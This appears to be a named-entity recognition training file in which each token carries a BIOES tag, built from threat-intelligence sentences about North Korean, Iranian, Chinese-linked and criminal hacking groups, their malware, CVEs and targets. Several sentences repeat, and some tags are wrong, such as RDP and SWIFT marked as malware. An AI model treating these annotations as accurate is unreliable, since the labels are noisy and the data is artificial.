+United B-LOC +States E-LOC +. O + +While O +North B-LOC +Korean E-LOC +cyber O +operations O +against O +specific O +countries O +may O +have O +been O +driven O +by O +diplomatic O +factors O +and O +perceived O +insults O +against O +Pyongyang O +, O +the O +application O +of O +increasingly O +restrictive O +and O +numerous O +financial S-IDTY +sanctions O +against O +North B-LOC +Korea E-LOC +probably O +contributed O +to O +the O +formation O +of O +APT38 S-APT +. O + +APT38 S-APT +'s O +operations O +began O +in O +February B-TIME +2014 E-TIME +and O +were O +likely O +influenced O +by O +financial O +sanctions O +enacted O +in O +March B-TIME +2013 E-TIME +that O +blocked O +bulk O +cash O +transfers O +and O +restricted O +North B-LOC +Korea E-LOC +'s O +access O +to O +international O +banking O +systems O +. 
O + +APT37 S-APT +( O +Reaper S-APT +) O +, O +another O +North B-LOC +Korean E-LOC +state-sponsored O +group O +, O +targeted O +a O +Middle B-LOC +Eastern E-LOC +financial B-IDTY +company E-IDTY +, O +but O +there O +was O +no O +evidence O +of O +financial O +fraud O +. O + +APT37 S-APT +, O +another O +North B-LOC +Korean E-LOC +state-sponsored O +group O +, O +targeted O +a O +Middle B-LOC +Eastern E-LOC +financial B-IDTY +company E-IDTY +, O +but O +there O +was O +no O +evidence O +of O +financial O +fraud O +. O + +Early O +APT38 S-APT +operations O +suggest O +that O +the O +group O +began O +targeting O +financial B-IDTY +institutions E-IDTY +with O +an O +intent O +to O +manipulate O +financial O +transaction O +systems O +at O +least O +as O +early O +as O +February B-TIME +2014 E-TIME +, O +although O +we O +did O +not O +observe O +fraudulent O +transactions O +until O +2015 S-TIME +. O + +We O +do O +not O +have O +evidence O +that O +the O +earliest O +targeted O +financial B-IDTY +institutions E-IDTY +were O +victimized O +by O +fraudulent O +transactions O +before O +APT38 S-APT +left O +the O +compromised O +environments O +, O +possibly O +indicating O +that O +APT38 S-APT +was O +conducting O +reconnaissance-only B-ACT +activity E-ACT +at O +that O +time O +. O + +In O +early B-TIME +2014 E-TIME +, O +the O +APT38 S-APT +deployed O +NESTEGG S-MAL +( O +a O +backdoor O +) O +and O +KEYLIME S-MAL +( O +a O +keylogger S-MAL +) O +malware O +designed O +to O +impact O +financial O +institution-specific O +systems O +at O +a O +Southeast B-LOC +Asian E-LOC +bank S-IDTY +. O + +In O +early B-TIME +2014 E-TIME +, O +the O +APT38 S-APT +deployed O +NESTEGG S-MAL +( O +a O +backdoor O +) O +and O +KEYLIME S-MAL +( O +a O +keylogger S-MAL +) O +malware O +designed O +to O +impact O +financial O +institution-specific O +systems O +at O +a O +Southeast B-LOC +Asian E-LOC +bank S-IDTY +. 
O + +From O +November B-TIME +2015 E-TIME +through O +the O +end B-TIME +of I-TIME +2016 E-TIME +, O +APT38 S-APT +was O +involved O +in O +at O +least O +nine O +separate O +compromises O +against O +banks S-IDTY +. O + +Per O +the O +complaint O +, O +the O +email S-ACT +account O +watsonhenny@gmail.com S-EMAIL +was O +used O +to O +send O +LinkedIn O +invitations O +to O +employees S-IDTY +of O +a O +bank O +later O +targeted O +by O +APT38 S-APT +. O + +Further O +, O +the O +recent O +DOJ O +complaint O +provides O +insight O +into O +initial O +compromise O +techniques O +conducted O +by O +North B-LOC +Korean E-LOC +operators S-APT +against O +APT38 S-APT +targets O +, O +which O +may O +have O +been O +leveraged O +as O +part O +of O +the O +initial O +compromise O +into O +the O +targeted O +organizations O +. O + +This O +is O +corroborated O +by O +our O +identification O +of O +TEMP.Hermit S-APT +'s O +use O +of O +MACKTRUCK S-MAL +at O +a O +bank O +, O +preceding O +the O +APT38 S-APT +operation O +targeting O +the O +bank S-IDTY +'s O +SWIFT O +systems O +in O +late B-TIME +2015 E-TIME +. O + +APT38 S-APT +relies O +on O +DYEPACK S-MAL +, O +a O +SWIFT O +transaction-hijacking O +framework O +, O +to O +initiate O +transactions O +, O +steal O +money O +, O +and O +hide O +any O +evidence O +of O +the O +fraudulent O +transactions O +from O +the O +victimized O +bank S-IDTY +. O + +The O +APT38 S-APT +uses O +DYEPACK S-MAL +to O +manipulate O +the O +SWIFT O +transaction O +records O +and O +hide O +evidence O +of O +the O +malicious O +transactions O +, O +so O +bank B-IDTY +personnel E-IDTY +are O +none O +the O +wiser O +when O +they O +review O +recent O +transactions O +. O + +During O +this O +heist O +, O +APT38 S-APT +waited O +for O +a O +holiday O +weekend O +in O +the O +respective O +countries O +to O +increase O +the O +likelihood O +of O +hiding O +the O +transactions O +from O +banking S-IDTY +authorities O +. 
O + +During O +one O +reported O +incident O +, O +APT38 S-APT +caused O +an O +outage O +in O +the O +bank S-IDTY +'s O +essential O +services O +. O + +We O +attribute O +APT38 S-APT +to O +North B-LOC +Korean E-LOC +state-sponsored O +operators S-APT +based O +on O +a O +combination O +of O +technical O +indicators O +linking O +the O +activity O +to O +Pyongyang O +and O +details O +released O +by O +DOJ O +implicating O +North B-LOC +Korean E-LOC +national O +Park O +Jin O +Hyok O +in O +a O +criminal O +conspiracy O +. O + +As O +detailed O +in O +the O +DOJ O +complaint O +, O +a O +sample O +of O +WHITEOUT S-MAL +malware S-MAL +we O +attribute O +to O +APT38 S-APT +was O +used O +between O +2015 S-TIME +and O +2016 S-TIME +against O +a O +Southeast B-LOC +Asian E-LOC +bank S-IDTY +. O + +APT38 S-APT +'s O +increasingly O +aggressive O +targeting O +against O +banks S-IDTY +and O +other O +financial B-IDTY +institutions E-IDTY +has O +paralleled O +North B-LOC +Korea E-LOC +'s O +worsening O +financial O +condition O +. O + +APT38 S-APT +'s O +increasingly O +aggressive O +targeting O +against O +banks S-IDTY +and O +other O +financial B-IDTY +institutions E-IDTY +has O +paralleled O +North B-LOC +Korea E-LOC +'s O +worsening O +financial O +condition O +. O + +APT38 S-APT +'s O +increasingly O +aggressive O +targeting O +against O +banks S-IDTY +and O +other O +financial B-IDTY +institutions E-IDTY +has O +paralleled O +North B-LOC +Korea E-LOC +'s O +worsening O +financial O +condition O +. O + +Malware O +overlaps O +between O +APT38 S-APT +and O +TEMP.Hermit S-APT +highlight O +the O +shared O +development O +resources O +accessible O +by O +multiple O +operational B-APT +groups E-APT +linked O +to O +North B-LOC +Korean E-LOC +state-sponsored O +activity O +. 
O + +APT39 S-APT +has O +prioritized O +the O +telecommunications B-IDTY +sector E-IDTY +, O +with O +additional O +targeting O +of O +the O +travel B-IDTY +industry E-IDTY +and O +IT B-IDTY +firms E-IDTY +that O +support O +it O +and O +the O +high-tech B-IDTY +industry E-IDTY +. O + +This O +is O +evidence O +of O +shared O +motivation O +and O +intent O +to O +target O +the O +SWIFT O +system O +by O +the O +North B-LOC +Korean E-LOC +operators S-APT +performing O +the O +reconnaissance O +and O +APT38 S-APT +which O +later O +targeted O +that O +organization O +. O + +Although O +APT38 S-APT +is O +distinct O +from O +other O +TEMP.Hermit B-ACT +activity E-ACT +, O +both O +groups S-APT +operate O +consistently O +within O +the O +interests O +of O +the O +North B-LOC +Korean E-LOC +state O +. O + +Based O +on O +details O +published O +in O +the O +DOJ O +complaint O +against O +North B-LOC +Korean E-LOC +programmer O +Park O +Jin O +Hyok O +, O +we O +know O +that O +APT38 S-APT +and O +other O +cyber B-APT +operators E-APT +linked O +to O +TEMP.Hermit S-APT +are O +associated O +with O +Lab B-IDTY +110 E-IDTY +, O +an O +organization O +subordinate O +to O +or O +synonymous O +with O +the O +6th O +Technical O +Bureau O +in O +North B-LOC +Korea E-LOC +. O + +As O +detailed O +in O +the O +DOJ O +complaint O +, O +a O +sample O +of O +WHITEOUT S-MAL +( O +aka O +Contopee S-MAL +) O +malware O +we O +attribute O +to O +APT38 S-APT +was O +used O +between O +2015 S-TIME +and O +2016 S-TIME +against O +a O +Southeast B-LOC +Asian E-LOC +bank S-IDTY +. 
O + +Based O +on O +details O +published O +in O +the O +DOJ O +complaint O +against O +North B-LOC +Korean E-LOC +programmer O +Park O +Jin O +Hyok O +, O +we O +know O +that O +APT38 S-APT +and O +other O +cyber B-APT +operators E-APT +linked O +to O +TEMP.Hermit S-APT +are O +associated O +with O +Lab B-IDTY +110 E-IDTY +, O +an O +organization O +subordinate O +to O +or O +synonymous O +with O +the O +6th O +Technical O +Bureau O +in O +North B-LOC +Korea E-LOC +'s O +Reconnaissance B-IDTY +General I-IDTY +Bureau E-IDTY +( O +RGB S-IDTY +) O +. O + +APT38 S-APT +. O + +As O +detailed O +in O +the O +DOJ O +complaint O +, O +a O +sample O +of O +WHITEOUT S-MAL +( O +aka O +Contopee S-MAL +) O +malware O +we O +attribute O +to O +APT38 S-APT +was O +used O +between O +2015 S-TIME +and O +2016 S-TIME +against O +a O +Southeast B-LOC +Asian E-LOC +bank S-IDTY +. O + +APT38 S-APT +'s O +targeting O +of O +financial B-IDTY +institutions E-IDTY +is O +most O +likely O +an O +effort O +by O +the O +North B-LOC +Korean E-LOC +government O +to O +supplement O +their O +heavily-sanctioned O +economy O +. O + +We O +have O +moderate O +confidence O +APT39 S-APT +operations O +are O +conducted O +in O +support O +of O +Iranian S-LOC +national O +interests O +based O +on O +regional O +targeting O +patterns O +focused O +in O +the O +Middle B-LOC +East E-LOC +. O + +APT39 S-APT +'s O +focus O +on O +the O +widespread O +theft O +of O +personal O +information O +sets O +it O +apart O +from O +other O +Iranian S-LOC +groups S-APT +FireEye S-SECTEAM +tracks O +, O +which O +have O +been O +linked O +to O +influence O +operations O +, O +disruptive O +attacks O +, O +and O +other O +threats O +. 
O + +APT39 S-APT +'s O +focus O +on O +the O +telecommunications B-IDTY +and I-IDTY +travel I-IDTY +industries E-IDTY +suggests O +intent O +to O +perform O +monitoring O +, O +tracking O +, O +or O +surveillance O +operations O +against O +specific B-IDTY +individuals E-IDTY +, O +collect O +proprietary O +or O +customer O +data O +for O +commercial O +or O +operational O +purposes O +that O +serve O +strategic O +requirements O +related O +to O +national O +priorities O +, O +or O +create O +additional O +accesses O +and O +vectors O +to O +facilitate O +future O +campaigns S-ACT +. O + +Other O +groups S-APT +attributed O +to O +Iranian S-LOC +attackers S-APT +, O +such O +as O +Rocket B-APT +Kitten E-APT +, O +have O +targeted O +Iranian S-LOC +individuals O +in O +the O +past O +, O +including O +anonymous B-IDTY +proxy I-IDTY +users E-IDTY +, O +researchers S-IDTY +, O +journalists S-IDTY +, O +and O +dissidents S-IDTY +. O + +Remexi S-MAL +is O +a O +basic O +back O +door O +Trojan S-MAL +that O +allows O +Cadelle S-APT +to O +open O +a O +remote O +shell O +on O +the O +computer O +and O +execute O +commands O +. O + +Remexi S-MAL +is O +a O +basic O +back O +door O +Trojan S-MAL +that O +allows O +attackers S-APT +to O +open O +a O +remote O +shell O +on O +the O +computer O +and O +execute O +commands O +. O + +One O +group O +, O +which O +we O +call O +Cadelle S-APT +, O +uses O +Backdoor.Cadelspy S-MAL +, O +while O +the O +other O +, O +which O +we've O +named O +Chafer S-APT +, O +uses O +Backdoor.Remexi S-MAL +and O +Backdoor.Remexi.B S-MAL +. O + +APT39 S-APT +facilitates O +lateral O +movement O +through O +myriad O +tools O +such O +as O +Remote B-MAL +Desktop I-MAL +Protocol E-MAL +( O +RDP S-MAL +) O +, O +Secure B-MAL +Shell E-MAL +( O +SSH S-MAL +) O +, O +PsExec S-MAL +, O +RemCom S-MAL +, O +and O +xCmdSvc S-MAL +. 
O + +The O +APT39 S-APT +were O +using O +an O +improved O +version O +of O +Remexi O +in O +what O +the O +victimology O +suggests O +might O +be O +a O +domestic O +cyber-espionage O +operation O +. O + +A O +well-funded O +, O +highly O +active O +group O +of O +Middle B-LOC +Eastern E-LOC +hackers O +was O +caught O +, O +yet O +again O +, O +using O +a O +lucrative O +zero-day S-VULNAME +exploit S-VULNAME +in O +the O +wild O +to O +break O +into O +computers O +and O +infect O +them O +with O +powerful O +spyware O +developed O +by O +an O +infamous O +cyberweapons O +dealer O +named O +Gamma B-APT +Group E-APT +. O + +A O +well-funded O +, O +highly O +active O +BlackOasis B-APT +group E-APT +of O +Middle B-LOC +Eastern E-LOC +hackers O +was O +caught O +, O +yet O +again O +, O +using O +a O +lucrative O +zero-day S-VULNAME +exploit S-VULNAME +in O +the O +wild O +to O +break O +into O +computers O +and O +infect O +them O +with O +powerful O +spyware O +developed O +by O +an O +infamous O +cyberweapons O +dealer O +named O +Gamma B-APT +Group E-APT +. O + +The O +Middle B-LOC +Eastern E-LOC +hacker O +group O +in O +this O +case O +is O +codenamed O +" O +BlackOasis S-APT +" O +. O + +Kaspersky S-SECTEAM +found O +the O +BlackOasis B-APT +group E-APT +was O +exploiting O +a O +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +zero-day S-VULNAME +vulnerability O +( O +CVE-2016-4117 S-VULID +) O +to O +remotely O +deliver O +the O +latest O +version O +of O +" O +FinSpy S-MAL +" O +malware O +, O +according O +to O +a O +new O +blog O +post O +published O +Monday O +. O + +Kaspersky S-SECTEAM +found O +the O +group O +was O +exploiting O +a O +Adobe B-TOOL +Flash I-TOOL +Player E-TOOL +zero-day S-VULNAME +vulnerability O +( O +CVE-2016-4117 S-VULID +) O +to O +remotely O +deliver O +the O +latest O +version O +of O +" O +FinSpy S-MAL +" O +malware O +, O +according O +to O +a O +new O +blog O +post O +published O +Monday O +. 
O + +BlackOasis S-APT +' O +interests O +span O +a O +wide O +gamut O +of O +figures O +involved O +in O +Middle B-LOC +Eastern E-LOC +politics S-IDTY +. O + +REDBALDKNIGHT S-APT +, O +also O +known O +as O +BRONZE B-APT +BUTLER E-APT +and O +Tick S-APT +, O +is O +a O +cyberespionage S-ACT +group O +known O +to O +target O +Japanese S-LOC +organizations O +such O +as O +government B-IDTY +agencies E-IDTY +( O +including O +defense S-IDTY +) O +as O +well O +as O +those O +in O +biotechnology S-IDTY +, O +electronics B-IDTY +manufacturing E-IDTY +, O +and O +industrial B-IDTY +chemistry E-IDTY +. O + +REDBALDKNIGHT S-APT +, O +also O +known O +as O +BRONZE B-APT +BUTLER E-APT +and O +Tick S-APT +, O +is O +a O +cyberespionage S-ACT +group O +known O +to O +target O +Japan S-LOC +such O +as O +government B-IDTY +agencies E-IDTY +as O +well O +as O +those O +in O +biotechnology S-IDTY +, O +electronics B-IDTY +manufacturing E-IDTY +, O +and O +industrial B-IDTY +chemistry E-IDTY +. O + +In O +fact O +, O +REDBALDKNIGHT S-APT +has O +been O +targeting O +Japan S-LOC +as O +early O +as O +2008 S-TIME +, O +based O +on O +the O +file O +properties O +of O +the O +decoy B-FILE +documents E-FILE +they've O +been O +sending O +to O +their O +targets O +. O + +In O +fact O +, O +REDBALDKNIGHT S-APT +has O +been O +zeroing O +in O +on O +Japanese S-LOC +organizations O +as O +early O +as O +2008 S-TIME +— O +at O +least O +based O +on O +the O +file O +properties O +of O +the O +decoy B-FILE +documents E-FILE +they've O +been O +sending O +to O +their O +targets O +. O + +Secureworks® S-SECTEAM +incident O +responders O +and O +Counter O +Threat O +Unit™ O +( O +CTU S-SECTEAM +) O +researchers O +investigated O +activities S-ACT +associated O +with O +the O +BRONZE B-APT +BUTLER E-APT +( O +also O +known O +as O +Tick S-APT +) O +threat O +group O +, O +which O +likely O +originates O +in O +the O +People O +. 
O + +Targeting O +data O +supports O +the O +belief O +that O +APT39 S-APT +'s O +key O +mission O +is O +to O +track O +or O +monitor O +targets O +of O +interest O +, O +collect O +personal O +information O +, O +including O +travel O +itineraries O +, O +and O +gather O +customer O +data O +from O +telecommunications B-IDTY +firms E-IDTY +. O + +BRONZE B-APT +BUTLER E-APT +has O +used O +a O +broad O +range O +of O +publicly O +available O +( O +Mimikatz S-MAL +and O +gsecdump S-MAL +) O +and O +proprietary O +( O +Daserf S-MAL +and O +Datper S-MAL +) O +tools O +. O + +BRONZE B-APT +BUTLER E-APT +are O +also O +fluent O +in O +Japanese S-LOC +, O +crafting O +phishing B-ACT +emails S-TOOL +in O +native O +Japanese S-LOC +and O +operating O +successfully O +within O +a O +Japanese-language O +environment O +. O + +BRONZE B-APT +BUTLER E-APT +has O +demonstrated O +the O +ability O +to O +identify O +a O +significant O +zero-day S-VULNAME +vulnerability O +within O +a O +popular O +Japanese S-LOC +corporate O +tool O +and O +then O +use O +scan-and-exploit B-ACT +techniques E-ACT +to O +indiscriminately O +compromise O +Japanese S-LOC +Internet-facing O +enterprise O +systems O +. O + +The O +group O +has O +demonstrated O +the O +ability O +to O +identify O +a O +significant O +zero-day S-VULNAME +vulnerability O +within O +a O +popular O +Japanese S-LOC +corporate O +tool O +and O +then O +use O +scan-and-exploit B-ACT +techniques E-ACT +to O +indiscriminately O +compromise O +Japanese S-LOC +Internet-facing O +enterprise O +systems O +. O + +BRONZE B-APT +BUTLER E-APT +has O +used O +phishing B-ACT +emails S-TOOL +with O +Flash S-TOOL +animation O +attachments O +to O +download O +and O +execute O +Daserf S-MAL +malware S-MAL +, O +and O +has O +also O +leveraged O +Flash S-TOOL +exploits S-VULNAME +for O +SWC B-ACT +attacks E-ACT +. 
O + +The O +group O +has O +used O +phishing B-ACT +emails S-TOOL +with O +Flash S-TOOL +animation O +attachments O +to O +download O +and O +execute O +Daserf S-MAL +malware S-MAL +, O +and O +has O +also O +leveraged O +Flash S-TOOL +exploits S-VULNAME +for O +SWC B-ACT +attacks E-ACT +. O + +BRONZE B-APT +BUTLER E-APT +uses O +credential O +theft O +tools O +such O +as O +Mimikatz S-MAL +and O +WCE S-MAL +to O +steal O +authentication O +information O +from O +the O +memory O +of O +compromised O +hosts O +. O + +While O +investigating O +a O +2016 S-TIME +intrusion O +, O +Secureworks S-SECTEAM +identified O +BRONZE B-APT +BUTLER E-APT +exploiting O +a O +then-unpatched O +remote B-ACT +code I-ACT +execution E-ACT +vulnerability O +( O +CVE-2016-7836 S-VULID +) O +in O +SKYSEA O +Client O +View O +, O +a O +popular O +Japanese S-LOC +product O +used O +to O +manage O +an O +organization O +. O + +While O +investigating O +a O +2016 S-TIME +intrusion O +, O +Secureworks S-SECTEAM +incident O +responders O +identified O +BRONZE B-APT +BUTLER E-APT +exploiting O +a O +then-unpatched O +remote B-ACT +code I-ACT +execution E-ACT +vulnerability O +( O +CVE-2016-7836 S-VULID +) O +in O +SKYSEA O +Client O +View O +, O +a O +popular O +Japanese S-LOC +product O +used O +to O +manage O +an O +organization O +. O + +Several O +xxmm O +samples O +analyzed O +by O +CTU S-SECTEAM +researchers O +incorporate O +Mimikatz S-MAL +, O +allowing O +BRONZE B-APT +BUTLER E-APT +to O +issue O +Mimikatz S-MAL +commands O +directly O +from O +xxmm O +. O + +BRONZE B-APT +BUTLER E-APT +compromises O +organizations O +to O +conduct O +cyberespionage S-APT +, O +primarily O +focusing O +on O +Japan S-LOC +. 
O + +Symantec S-SECTEAM +discovered O +the O +most O +recent O +wave O +of O +Tick B-ACT +attacks E-ACT +in O +July B-TIME +2015 E-TIME +, O +when O +the O +group O +compromised O +three O +different O +Japanese S-LOC +websites O +with O +a O +Flash B-ACT +( I-ACT +.swf I-ACT +) I-ACT +exploit E-ACT +to O +mount O +watering B-ACT +hole I-ACT +attacks E-ACT +. O + +Carbanak S-MAL +is O +a O +remote O +backdoor O +( O +initially O +based O +on O +Carberp S-MAL +) O +, O +designed O +for O +espionage S-ACT +, O +data O +Exfiltration S-ACT +and O +to O +provide O +remote O +access O +to O +infected O +machines O +. O + +Symantec S-SECTEAM +discovered O +the O +most O +recent O +wave O +of O +Tick B-ACT +attacks E-ACT +in O +July B-TIME +2015 E-TIME +, O +when O +BRONZE B-APT +BUTLER E-APT +compromised O +three O +different O +Japanese S-LOC +websites O +with O +a O +Flash B-ACT +( I-ACT +.swf I-ACT +) I-ACT +exploit E-ACT +to O +mount O +watering B-ACT +hole I-ACT +attacks E-ACT +. O + +In O +some O +cases O +, O +the O +attackers S-APT +used O +the O +Society O +for O +Worldwide B-MAL +Interbank I-MAL +Financial I-MAL +Telecommunication E-MAL +( O +SWIFT S-MAL +) O +network O +to O +transfer O +money O +to O +their O +accounts O +. O + +Carbanak S-FILE +is O +a O +backdoor S-MAL +used O +by O +the O +attackers S-APT +to O +compromise O +the O +victim O +. O + +If O +found O +on O +the O +target O +system O +, O +Carbanak S-MAL +will O +try O +to O +exploit S-VULNAME +a O +known O +vulnerability O +in O +Windows S-OS +XP O +, O +Windows S-OS +Server O +2003 O +, O +Windows S-OS +Vista O +, O +Windows S-OS +Server O +2008 O +, O +Windows S-OS +7 O +, O +Windows S-OS +8 O +, O +and O +Windows S-OS +Server O +2012 O +, O +CVE-2013-3660 S-VULID +, O +for O +local O +privilege O +escalation O +. 
O + +To O +enable O +connections O +to O +the O +infected O +computer O +using O +the O +Remote B-MAL +Desktop I-MAL +Protocol E-MAL +( O +RDP S-MAL +) O +, O +Carbanak S-MAL +sets O +Termservice O +service O +execution O +mode O +to O +Auto O +. O + +Carbanak S-MAL +is O +also O +aware O +of O +the O +IFOBS O +banking O +application O +and O +can O +, O +on O +command O +, O +substitute O +the O +details O +of O +payment O +documents O +in O +the O +IFOBS O +system O +. O + +Sensitive O +bank O +documents O +have O +be O +found O +on O +the O +servers O +that O +were O +controlling O +Carbanak S-MAL +. O + +Existing O +telemetry O +indicates O +that O +the O +Carbanak S-MAL +attackers S-APT +are O +trying O +to O +expand O +operations O +to O +other O +Baltic S-LOC +and O +Central B-LOC +Europe E-LOC +countries O +, O +the O +Middle B-LOC +East E-LOC +, O +Asia S-LOC +and O +Africa S-LOC +. O + +FIN7 S-APT +is O +a O +financially-motivated O +threat O +group O +that O +has O +been O +associated O +with O +malicious O +operations O +dating O +back O +to O +late B-TIME +2015 E-TIME +. O + +As O +with O +previous O +campaigns S-ACT +, O +and O +as O +highlighted O +in O +our O +annual O +M-Trends S-SECTEAM +2017 S-TIME +report O +, O +FIN7 S-APT +is O +calling O +stores O +at O +targeted O +organizations O +to O +ensure O +they O +received O +the O +email S-ACT +and O +attempting O +to O +walk O +them O +through O +the O +infection O +process O +. O + +We O +believe O +that O +the O +Carbanak S-MAL +campaign O +is O +a O +clear O +indicator O +of O +a O +new O +era O +in O +cybercrime O +in O +which O +criminals S-APT +use O +APT B-ACT +techniques E-ACT +directly O +against O +the O +financial B-IDTY +industry E-IDTY +instead O +of O +through O +its O +customers S-IDTY +. O + +While O +FIN7 S-APT +has O +embedded O +VBE S-MAL +as O +OLE O +objects O +for O +over O +a O +year O +, O +they O +continue O +to O +update O +their O +script O +launching O +mechanisms O +. 
O + +This O +report O +describes O +the O +details O +and O +type O +of O +operations O +carried O +out O +by O +Carbanak S-MAL +that O +focuses O +on O +financial B-IDTY +industry E-IDTY +, O +such O +as O +payment B-IDTY +providers E-IDTY +, O +retail B-IDTY +industry E-IDTY +and O +PR B-IDTY +companies E-IDTY +. O + +Carbanak S-MAL +has O +its O +origin O +in O +more O +common O +financial O +fraud O +including O +theft O +from O +consumer S-IDTY +and O +corporate O +bank O +accounts O +in O +Europe S-LOC +and O +Russia S-LOC +, O +using O +standard O +banking O +malware O +, O +mainly O +Carberp S-MAL +. O + +The O +group O +has O +its O +origin O +in O +more O +common O +financial O +fraud O +including O +theft O +from O +consumer S-IDTY +and O +corporate O +bank O +accounts O +in O +Europe S-LOC +and O +Russia S-LOC +, O +using O +standard O +banking O +malware O +, O +mainly O +Carberp S-MAL +. O + +From O +2013 S-TIME +Carbanak S-MAL +intensified O +its O +activity O +focused O +on O +banks S-IDTY +and O +electronic B-IDTY +payment E-IDTY +systems O +in O +Russia S-LOC +and O +in O +the O +post-Soviet S-LOC +space S-IDTY +. O + +Since O +2013 S-TIME +Carbanak S-MAL +has O +successfully O +gained O +access O +to O +networks O +of O +more O +than O +50 O +banks S-IDTY +and O +5 O +payment B-IDTY +systems E-IDTY +. O + +The O +first O +successful O +bank B-ACT +robbery E-ACT +was O +committed O +by O +this O +group O +in O +January B-TIME +2013 E-TIME +. O + +To O +reduce O +the O +risk O +of O +losing O +access O +to O +the O +internal O +bank O +network O +, O +the O +Carbanak S-MAL +, O +in O +addition O +to O +malicious O +programs O +, O +also O +used O +for O +remote O +access O +legitimate O +programs O +such O +as O +Ammy B-MAL +Admin E-MAL +and O +Team B-MAL +Viewer E-MAL +. 
O + +We O +have O +no O +evidence O +of O +compromises O +against O +banks S-IDTY +in O +Western B-LOC +Europe E-LOC +or O +United B-LOC +States E-LOC +, O +but O +it O +should O +be O +noted O +that O +the O +attackers S-APT +methods O +could O +be O +utilized O +against O +banks S-IDTY +outside O +of O +Russia S-LOC +as O +well O +. O + +Additionally O +the O +reports O +on O +Carbanak S-MAL +show O +a O +different O +picture O +, O +where O +banks S-IDTY +targeted O +outside O +of O +Russia S-LOC +, O +specifically O +Europe S-LOC +, O +USA S-LOC +and O +Japan S-LOC +are O +mentioned O +, O +which O +does O +not O +match O +our O +research O +. O + +Without O +any O +insight O +into O +the O +evidence O +Kaspersky S-SECTEAM +has O +obtained O +, O +we O +can O +only O +repeat O +our O +view O +that O +Anunak S-APT +has O +targeted O +only O +banks S-IDTY +in O +Russia S-LOC +and O +we O +have O +no O +concrete O +reports O +of O +compromised O +banks S-IDTY +outside O +of O +Russia S-LOC +directly O +related O +to O +this O +criminal O +group O +. O + +Charming B-APT +Kitten E-APT +is O +an O +Iranian S-LOC +cyberespionage S-ACT +group O +operating O +since O +approximately O +2014 S-TIME +. O + +These O +attacks O +have O +included O +criminal B-APT +groups E-APT +responsible O +for O +the O +delivery O +of O +NewPosThings O +, O +MalumPOS O +and O +PoSeidon S-APT +point O +of O +sale O +Malware O +, O +as O +well O +as O +Carbanak S-MAL +from O +the O +Russian S-LOC +criminal B-APT +organization E-APT +we O +track O +as O +Carbon B-APT +Spider E-APT +. O + +The O +Charming B-APT +Kitten' E-APT +focus O +appears O +to O +be O +individuals O +of O +interest O +to O +Iran S-LOC +in O +the O +fields O +of O +academic B-IDTY +research E-IDTY +. 
O + +Sometimes O +, O +they O +aim O +at O +establishing O +a O +foothold O +on O +the O +target O +'s O +computer O +to O +gain O +access O +into O +their O +organization O +, O +but O +, O +based O +on O +our O +data O +, O +this O +is O +usually O +not O +their O +main O +objective O +, O +as O +opposed O +to O +other O +Iranian S-LOC +threat B-APT +groups E-APT +, O +such O +as O +OilRig S-APT +and O +CopyKittens S-APT +. O + +Flying B-APT +Kitten E-APT +( O +which O +is O +another O +name O +given O +by O +the O +security B-IDTY +industry E-IDTY +to O +Charming B-APT +Kitten E-APT +) O +was O +one O +of O +the O +first O +groups S-APT +to O +be O +described O +as O +a O +coherent O +threat O +actor O +conducting O +operations O +against O +political O +opponents O +of O +the O +IRI O +( O +Islamic B-LOC +Republic I-LOC +of I-LOC +Iran E-LOC +) O +government O +and O +foreign O +espionage S-ACT +targets O +. O + +Flying B-APT +Kitten E-APT +was O +one O +of O +the O +first O +groups S-APT +to O +be O +described O +as O +a O +coherent O +threat O +actor O +conducting O +operations O +against O +political O +opponents O +of O +government S-IDTY +and O +foreign O +espionage S-ACT +targets O +. O + +At O +certain O +times O +, O +Mesri O +has O +been O +a O +member O +of O +an O +Iran-based S-LOC +hacking O +group O +called O +the O +Turk B-APT +Black I-APT +Hat E-APT +security O +team O +" O +. O + +During O +intense O +intelligence O +gathering O +over O +the O +last O +24 O +months O +, O +we O +observed O +the O +technical O +capabilities O +of O +the O +Operation B-APT +Cleaver E-APT +team O +rapidly O +evolve O +faster O +than O +any O +previously O +observed O +Iranian S-LOC +effort O +. O + +TinyZBot S-MAL +is O +a O +bot O +written O +in O +C# S-TOOL +and O +developed O +by O +the O +Cleaver S-APT +team O +. 
O + +Some O +of O +the O +teams O +publicly O +known O +today O +include O +Iranian S-LOC +Cyber B-APT +Army E-APT +, O +Ashiyane S-APT +, O +Islamic O +Cyber B-APT +Resistance I-APT +Group E-APT +, O +Izz B-APT +ad-Din I-APT +al-Qassam I-APT +Cyber I-APT +Fighters E-APT +, O +Parastoo S-APT +, O +Shabgard S-APT +, O +Iran B-APT +Black I-APT +Hats E-APT +and O +many O +others O +9 O +. O + +However O +, O +even O +though O +the O +TTPs O +of O +the O +Cleaver S-APT +team O +have O +some O +overlap O +to O +techniques O +used O +by O +Iranian S-LOC +Cyber B-APT +Army E-APT +, O +Ashiyane S-APT +( O +SQL B-ACT +injection E-ACT +) O +and O +Syrian B-IDTY +Electronic I-IDTY +Army E-IDTY +( O +phishing S-ACT +) O +, O +we O +believe O +this O +is O +largely O +the O +work O +of O +a O +new O +team O +. O + +The O +Cobalt B-APT +group E-APT +'s O +traditional O +" O +stomping O +grounds O +" O +are O +the O +Eastern B-LOC +Europe E-LOC +, O +Central B-LOC +Asia E-LOC +, O +and O +Southeast B-LOC +Asia E-LOC +. O + +Against O +targets O +in O +the O +CIS S-LOC +countries O +, O +the O +Cobalt S-APT +also O +used O +their O +own O +infrastructure O +, O +which O +included O +rented O +dedicated O +servers O +. O + +In O +several O +cases O +, O +the O +Cobalt S-APT +compromised O +company O +infrastructure O +and O +employee O +accounts O +in O +order O +to O +send O +phishing B-ACT +messages E-ACT +to O +partner O +companies O +in O +North S-LOC +and O +South B-LOC +America E-LOC +, O +Europe S-LOC +, O +CIS S-LOC +countries O +, O +and O +Central S-LOC +and O +Southeast B-LOC +Asia E-LOC +. O + +To O +ensure O +remote B-ACT +access E-ACT +to O +the O +workstation O +of O +an O +employee O +at O +a O +target O +organization O +, O +the O +Cobalt B-APT +group E-APT +( O +as O +in O +previous O +years O +) O +uses O +Beacon S-MAL +, O +a O +Trojan S-MAL +available O +as O +part O +of O +commercial O +penetration O +testing O +software O +. 
